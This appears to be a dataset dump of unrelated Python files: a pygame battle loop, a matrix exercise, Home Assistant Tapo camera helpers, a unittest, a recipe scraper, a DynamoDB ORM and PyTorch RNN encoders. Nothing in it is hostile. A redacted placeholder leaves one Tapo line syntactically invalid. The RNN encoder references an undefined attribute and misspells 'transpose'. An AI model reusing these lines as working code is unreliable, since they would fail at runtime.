pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| 3.265625 | 3 |
curso_em_video/0087a.py | marinaoliveira96/python-exercises | 0 | 5043 | <reponame>marinaoliveira96/python-exercises
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'A soma dos numeros pares é {soma}')
print(f'A soma dos valores da 3 coluna é {col3}')
print(f'O maior numero da 2 linha é {maior}') | 4.09375 | 4 |
custom_components/tapo_control/utils.py | david-kalbermatten/HomeAssistant-Tapo-Control | 0 | 5044 | <gh_stars>0
import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
def registerController(host, username, password):
return Tapo(host, username, password)
async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
password = <PASSWORD>.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""
async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False
async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData
async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)
async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)
async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
| 2.203125 | 2 |
camd3/infrastructure/component/tests/test_uidattr.py | mamrhein/CAmD3 | 0 | 5045 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: <NAME> (<EMAIL>)
#
# Copyright: (c) 2018 <NAME>
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 2.234375 | 2 |
s.py | tn012604409/HW3_chatRobot | 0 | 5046 | <gh_stars>0
import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
tag = soup.find_all('a','recipe-name')
articles=tag
return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
i=1
s=''
for post in current_articles:
temp=str(post)
num=int(temp.find("\" href="))
#print('The Number {0}: {1}'.format(i, temp[35:num]))
s=s+'The Number {0}: {1}\n'.format(i, temp[35:num])
i=i+1
return s
| 2.921875 | 3 |
awstin/dynamodb/orm.py | k2bd/awstin | 1 | 5047 | <reponame>k2bd/awstin
import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
values : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
Add or subtact two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
| 2.421875 | 2 |
Losses/__init__.py | SimonTheVillain/ActiveStereoNet | 17 | 5048 | from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
| 2.171875 | 2 |
model/src/recurrent.py | qkaren/converse_reading_cmr | 87 | 5049 | <filename>model/src/recurrent.py
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
self.opt = opt
self.dropout = dropout
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
h = h.view(self.num_layers, 2, shape[1], shape[3]).transpose(1,2).contiguous()
h = h.view(self.num_layers, shape[1], 2 * shape[3])
if self.top_layer_only:
return h[-1]
else:
return h.transose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
| 2.453125 | 2 |
